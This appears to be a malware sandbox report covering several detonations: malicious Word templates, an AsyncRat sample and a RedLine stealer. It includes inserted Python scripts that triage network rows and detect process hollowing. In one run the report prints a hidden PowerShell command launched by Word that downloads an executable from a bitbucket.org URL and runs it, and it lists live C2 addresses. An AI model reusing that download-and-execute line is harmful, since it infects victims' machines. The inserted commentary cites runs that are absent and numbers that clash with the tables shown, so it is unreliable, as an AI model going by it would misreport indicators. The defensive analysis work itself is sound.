Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ferrr.dotm" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 71.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/4556-0-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

memory/4556-1-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

memory/4556-3-0x00007FFD5E3CD000-0x00007FFD5E3CE000-memory.dmp

memory/4556-2-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

memory/4556-4-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

memory/4556-5-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-6-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-7-0x00007FFD1E3B0000-0x00007FFD1E3C0000-memory.dmp

memory/4556-8-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-10-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-9-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-11-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-13-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-12-0x00007FFD1C0E0000-0x00007FFD1C0F0000-memory.dmp

memory/4556-14-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-15-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-16-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-18-0x00007FFD1C0E0000-0x00007FFD1C0F0000-memory.dmp

memory/4556-19-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-17-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-45-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-46-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-47-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-53-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

memory/4556-54-0x00007FFD5E330000-0x00007FFD5E525000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

167s

Command Line

"C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1856 set thread context of 4472 N/A C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe

"C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
NL 45.137.65.94:4449 tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
NL 45.137.65.94:4449 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 45.137.65.94:4449 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 45.137.65.94:4449 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
NL 45.137.65.94:4449 tcp
NL 45.137.65.94:4449 tcp
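
The Network tables in this report mix three kinds of rows: reverse (in-addr.arpa) lookups sent to 8.8.8.8, which also appear in the document-only Word runs (behavioral14, behavioral28) and are sandbox background; forward lookups and TLS sessions to Office and Microsoft services; and the sample's own traffic, which here is direct-to-IP TCP with no preceding name lookup, 37.220.87.13:48790 in the RedLine runs (behavioral6, and behavioral5 further down) and 45.137.65.94:4449 in this AsyncRat run. The Python below is an added example, not part of this report or of the sandbox: it parses rows in this table's format and separates the three classes. The rows are copied from the behavioral6, behavioral4 and behavioral14 tables (behavioral14 contributes the bitbucket.org session flagged under "Legitimate hosting services abused"); the benign-suffix list is an assumption.

```python
"""Separate a sample's own connections from sandbox background traffic.

Added example: not part of this report or of the sandbox. Rows are copied
from the Network tables of behavioral6, behavioral4 and behavioral14; the
benign-suffix list is an assumption.
"""
from __future__ import annotations

from collections import Counter
from dataclasses import dataclass, field

# Rows copied from this report's Network tables (behavioral6, behavioral4, behavioral14).
NETWORK_ROWS = """\
Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
RU 37.220.87.13:48790 tcp
NL 45.137.65.94:4449 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
NL 45.137.65.94:4449 tcp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
"""

# Services the sandbox's own Office/Windows components contact (assumption).
BENIGN_SUFFIXES = ("officeapps.live.com", "cdn.office.net", "microsoft.com", "windowsupdate.com")


@dataclass(frozen=True)
class Endpoint:
    ip: str
    port: int
    country: str
    domain: str | None          # None for direct-to-IP connections with no name lookup


@dataclass
class NetworkTriage:
    candidates: list[tuple[Endpoint, int]] = field(default_factory=list)  # (endpoint, hits), ranked
    resolved: set[str] = field(default_factory=set)                       # forward lookups by the sample
    ignored: int = 0                                                      # rows treated as background


def parse_row(line: str) -> tuple[str, str, str | None, str] | None:
    """Split one table row; the Domain column is absent for raw TCP connections."""
    fields = line.split()
    if fields[:1] == ["Country"]:
        return None                                 # header row
    if len(fields) == 4:
        return fields[0], fields[1], fields[2], fields[3]
    if len(fields) == 3:
        return fields[0], fields[1], None, fields[2]
    return None


def triage_network(table: str) -> NetworkTriage:
    """Classify every row as background, a name lookup by the sample, or a connection candidate."""
    hits: Counter[Endpoint] = Counter()
    result = NetworkTriage()
    for line in table.splitlines():
        row = parse_row(line)
        if row is None:
            continue
        country, dest, domain, proto = row
        ip, _, port = dest.rpartition(":")
        if domain and domain.endswith(BENIGN_SUFFIXES):
            result.ignored += 1                     # Office/Windows telemetry
        elif proto == "udp" and port == "53":
            if domain and domain.endswith(".in-addr.arpa"):
                result.ignored += 1                 # reverse lookups: present in every run here
            elif domain:
                result.resolved.add(domain)
        elif proto == "tcp":
            hits[Endpoint(ip, int(port), country, domain)] += 1
    result.candidates = sorted(hits.items(), key=lambda kv: (-kv[1], kv[0].ip))
    return result


def ioc_lines(t: NetworkTriage) -> list[str]:
    """One 'ip:port country hits [domain]' line per candidate, for blocklist review."""
    return [f"{e.ip}:{e.port} {e.country} hits={n}" + (f" domain={e.domain}" if e.domain else "")
            for e, n in t.candidates]


if __name__ == "__main__":
    t = triage_network(NETWORK_ROWS)
    print("\n".join(ioc_lines(t)))
    print("resolved:", sorted(t.resolved), "| background rows ignored:", t.ignored)
```

The ranked output puts 37.220.87.13:48790 first (three connections in behavioral6; the behavioral5 table adds seven more under the same filter), then 45.137.65.94:4449 from this run, then the bitbucket.org session that behavioral14's Word document opened. Only the first two are direct-to-IP with no lookup, the pattern a RAT client produces when its C2 address is compiled in; the bitbucket.org row is a named fetch from a legitimate host, and what it retrieved, not the destination, decides its verdict.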

Files

memory/1856-0-0x0000000074CBE000-0x0000000074CBF000-memory.dmp

memory/1856-1-0x0000000000DC0000-0x0000000000E68000-memory.dmp

memory/1856-2-0x0000000003100000-0x000000000310C000-memory.dmp

memory/1856-3-0x0000000005780000-0x0000000005788000-memory.dmp

memory/4472-5-0x0000000000400000-0x0000000000416000-memory.dmp

memory/1856-7-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/4472-8-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/4472-9-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/4472-10-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/1856-11-0x0000000074CB0000-0x0000000075460000-memory.dmp

memory/4472-12-0x0000000074CB0000-0x0000000075460000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win7-20240729-en

Max time kernel

130s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1308 set thread context of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1308 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
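
Three runs in this report show the same injection shape: the dropper (Jtvcsfni.exe here and in behavioral6, GjIEmKW.exe in behavioral4) starts a signed .NET framework binary with an empty command line (InstallUtil.exe or MSBuild.exe), writes into it and calls SetThreadContext, which is the process-hollowing sequence. The "wrote to memory of" rows on their own are not evidence: the report records them for every parent/child pair, including cmd.exe starting schtasks.exe and timeout.exe, because process creation itself writes into the new process. The discriminating combination is SetThreadContext on a child that is a known host binary and received no arguments. The Python below is an added example, not part of this report or of the sandbox: it transcribes the behavioral5 and behavioral4 rows into an event list, adds behavioral6's powershell.exe child as a control that received writes but no context change, and correlates them. The host-binary list is an assumption.

```python
"""Correlate sandbox API events into a process-hollowing verdict.

Added example: not part of this report or of the sandbox. The events are
transcribed from this report's signature rows; the host-binary list is an
assumption.
"""
from __future__ import annotations

from collections import Counter

# .NET framework binaries commonly used as hollowing hosts (assumption).
DOTNET_HOSTS = {"installutil.exe", "msbuild.exe", "regasm.exe", "regsvcs.exe", "aspnet_compiler.exe"}

HOLLOWED = "hollowed .NET host: SetThreadContext on a bare LOLBin child"
CONTEXT_HIJACK = "thread context rewritten in a non-LOLBin child"
CHILD_SETUP = "parent wrote to child at creation (expected, not injection)"

# Constructed event log transcribed from the report: behavioral5 (PID 1308 -> 944),
# behavioral4 (PID 1856 -> 4472) and, as a control, behavioral6's powershell child.
EVENTS = [
    {"api": "CreateProcess", "pid": 1308, "image": r"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe"'},
    {"api": "CreateProcess", "pid": 944, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"},
    {"api": "SetThreadContext", "pid": 1308, "target_pid": 944},
    *({"api": "WriteProcessMemory", "pid": 1308, "target_pid": 944} for _ in range(12)),
    {"api": "CreateProcess", "pid": 1856, "image": r"C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\GjIEmKW.exe"'},
    {"api": "CreateProcess", "pid": 4472, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"'},
    {"api": "SetThreadContext", "pid": 1856, "target_pid": 4472},
    {"api": "CreateProcess", "pid": 3856, "image": r"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe"'},
    {"api": "CreateProcess", "pid": 1156, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA=='},
    *({"api": "WriteProcessMemory", "pid": 3856, "target_pid": 1156} for _ in range(3)),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def launched_bare(proc: dict) -> bool:
    """True when the command line is exactly the image path: no arguments to run."""
    return proc["cmdline"].strip().strip('"').lower() == proc["image"].lower()


def correlate(events: list[dict]) -> list[dict]:
    """Join CreateProcess, WriteProcessMemory and SetThreadContext by (source, target) PID."""
    procs = {e["pid"]: e for e in events if e["api"] == "CreateProcess"}
    writes = Counter((e["pid"], e["target_pid"]) for e in events if e["api"] == "WriteProcessMemory")
    ctx = {(e["pid"], e["target_pid"]) for e in events if e["api"] == "SetThreadContext"}
    findings = []
    for src, dst in sorted(set(writes) | ctx):
        child = procs.get(dst)
        if child is None:
            continue                      # target never observed as a created process
        host = basename(child["image"])
        if (src, dst) in ctx and host in DOTNET_HOSTS and launched_bare(child):
            verdict = HOLLOWED
        elif (src, dst) in ctx:
            verdict = CONTEXT_HIJACK
        else:
            verdict = CHILD_SETUP
        parent = procs.get(src)
        findings.append({
            "source": basename(parent["image"]) if parent else str(src),
            "target": host,
            "target_pid": dst,
            "writes": writes[(src, dst)],
            "verdict": verdict,
        })
    return findings


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f'{f["source"]} -> {f["target"]} (pid {f["target_pid"]}, {f["writes"]} writes): {f["verdict"]}')
```

With the report's events the output is two hollowed-host findings (InstallUtil.exe with 12 recorded writes; MSBuild.exe with none, since behavioral4 lists no WriteProcessMemory rows, which is why the correlation keys on SetThreadContext rather than on write counts) and one expected child-setup finding for powershell.exe. The dumps of PID 944's 0x00400000 region in the Files section below are the first place to look for the replaced image.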

Processes

C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe

"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe"

C:\Users\Admin\AppData\Local\Temp\powershell.exe

"C:\Users\Admin\AppData\Local\Temp\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Network

Country Destination Domain Proto
RU 37.220.87.13:48790 tcp

Files

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win7-20241010-en

Max time kernel

36s

Max time network

38s

Command Line

"C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe

"C:\Users\Admin\AppData\Local\Temp\OriginalBuild.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe"

Network

N/A

Files

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:41

Platform

win7-20240903-en

Max time kernel

125s

Max time network

124s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cgu3.docx"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cgu3.docx"

Network

Country Destination Domain Proto
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.23:443 bitbucket.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabA91E.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarA98E.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\{623B6A75-00E4-42B5-83F1-144E23162D60}

MD5 364883f2918d321cf88eb0277b178cde
SHA1 4c75a1bffa09228ed3da1fc2d9b0008fa5bb671b
SHA256 3bb37d90aaebda892c262dd318c2a311ed65b0f24b90106f9a625d3ac3adea0f
SHA512 9980d0e111c0a3e2999a59e98e8d2dc3aa4d02c346dd1302708e03abfd14fe2982fb1db2c7e1709c2fb27a1011506b9288fe9524ac0abb981374bc33d23de806

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{77216855-F693-4243-912C-A0DE14A27247}.FSD

MD5 556adc86e6e253a6cc9d711e08257e04
SHA1 c4407d6fbc05987c10b7d7e5ed9b310175c924f3
SHA256 105d3e6fb4c64c845cb876aad5e8b2c3e7e9e4a6ece6f82bdda666d2df2ac84f
SHA512 8865f42e5ee26d654bae985e1fec7cdea93001ad987a3de1a54ae6bb91dd2e1466484a0de6ef74575d1f2c3007ec581f68294dc9a50855e1031b7b3cd3e958b0

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 09e1bf6067381c630e302c845975cb21
SHA1 8dcd0c3a52d57ab9f44db4c06cb525eb5d7ae243
SHA256 e278a25493b0668f2cf0ec3667b14a505715c3af974d165f84689976cfd83f91
SHA512 bef4d2c5b8ef8e6aab86fbf0eed7ec8504db779016462472ae35892ebd0ad94619fda33d85a66eabfd4946958cba6f1e030017117be32e36bbec2357c6070904

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{8DFAB033-4FFA-499F-A6F3-AC78419960CB}.FSD

MD5 298ee91ff3e7b94f4a859d839be8f894
SHA1 6ee4265c3ad84ec30e1f73c17a30c8f73f4ff86a
SHA256 1157b893d0d08c6a96efc414e9f02cd26d801c8a2fc7ebed3283b465737daaf9
SHA512 6eeb5a6254e498f86ebb88216e36814fe7f12da5a9f1e2a1f9885831067c06646317cec9cca42837ee503285e0d0891a1686bd97243d9b7ae22e8a3454358647

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:43

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

152s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fasfs.dotm" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fasfs.dotm" /o ""

C:\Users\Admin\AppData\Local\Temp\powershell.exe

C:\Users\Admin\AppData\Local\Temp\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/damnman/damn/downloads/PUMPED_docc.exe','2d21412.exe');Start-Process '2d21412.exe'

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 240.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.63.31:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.117.150:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 31.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 150.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 7682d4d2079c6d281210acc35dea3f49
SHA1 5a5e94642a8dc681777b586dab28a5ad8cf37a19
SHA256 5ba4634105483ab09492666674ff826f7d2e7e6acb6508c2a3668f0ff937b507
